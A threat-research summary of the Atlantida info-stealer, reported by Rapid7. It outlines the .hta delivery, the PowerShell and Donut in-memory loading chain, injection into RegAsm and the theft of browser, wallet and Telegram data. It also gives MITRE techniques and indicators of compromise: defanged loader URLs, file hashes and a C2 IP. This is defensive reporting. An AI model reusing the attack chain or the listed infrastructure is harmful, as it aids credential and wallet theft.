Threat Research

Whispers of Atlantida: Safeguarding Your Digital Treasure | Rapid7 Blog

Securonix

Rapid7 exposed Atlantida, a new stealer delivered via a compromised site that tricks users into downloading a malicious file, then uses evasion techniques like reflective loading and injection. It steals browser data, cryptocurrency wallet data, Telegram desktop data, captures screens, and gathers hardware information before exfiltrating via a hardcoded C2 server. #Atlantida #Donut #RegAsm #PowerShell

Keypoints

  • Atlantida is a newly observed stealer by Rapid7, delivered through a compromised website via a malicious .hta file.
  • It employs evasion techniques, including reflective loading and process injection, to load the stealer in memory.
  • The toolset includes a three-stage in-memory loading chain that downloads a .NET downloader and uses Donut for in-memory execution.
  • Stage 3 loads the Atlantida stealer, which enumerates data from browsers, cryptocurrency wallets, Telegram data, Steam, FileZilla, and more.
  • Atlantida collects screen captures, hardware information, and text files from Desktop, then exfiltrates data via a C2 channel (though no data was sent in this instance).
  • Targeted data includes browser credentials, wallet data, and extensions data (ext IDs) from Chrome-based browsers and several wallet extensions listed in the article.

MITRE Techniques

  • [T1204.002] User Execution: Malicious File – “A user downloads and executes malicious .hta file”
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – “.hta contains malicious VBScript function”
  • [T1059.001] Command and Scripting Interpreter: PowerShell – “VBScript executes powershell to download powershell script”
  • [T1105] Ingress Tool Transfer – “A powershell script downloads an additional .Net Loader”
  • [T1620] Reflective Code Loading – “Powershell script executed the loader reflectively”
  • [T1055] Process Injection – “The .Net loader injects into RegAsm.exe process”
  • [T1555.003] Credentials from Web Browsers – “Atlantida steals stored browser data such as passwords, cookies, tokens, credit cards and autofills”
  • [T1555] Credentials from Password Stores – “Atlantida steals offline cryptocurrency wallets data, and other software data”
  • [T1082] System Information Discovery – “Atlantida collects victim’s hardware information”
  • [T1113] Screen Capture – “Atlantida captures victim’s screen”
  • [T1041] Exfiltration Over C2 Channel – “Atlantida exfiltrats all collected data”

Indicators of Compromise

  • [File Hash] Malicious artifacts – ReadEra_v1.4.2.hta (67b8776b9d8f581173bcb471e91ff1701cafbc92aaed858fe3cb26a31dd6a6d8) and AtlantidaStealer.exe (b4f4d51431c4e3f7aeb01057dc851454cff4e64d16c05d9da12dfb428715d130)
  • [URL] Malicious PowerShell download links – http://166.1.160[.]10/loader.txt, http://166.1.160[.]10/www.bin
  • [File Hash] Stored payloads – http://166.1.160[.]10/www_c.bin (f935143dba2fb65eef931c1dac74a740e58e9e911a13457f4cfa4c73a0c673b3)
  • [File Hash] Donut/loader hashes – http://166.1.160[.]10/www.bin (350216884486d1fafbd60e1d9c87c48149b058e4fab6b9a2a5cd7ea67ab250a0)
  • [IP] Command and control server – 45.144.232.99

Read more: https://www.rapid7.com/blog/post/2024/01/17/whispers-of-atlantida-safeguarding-your-digital-treasure/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint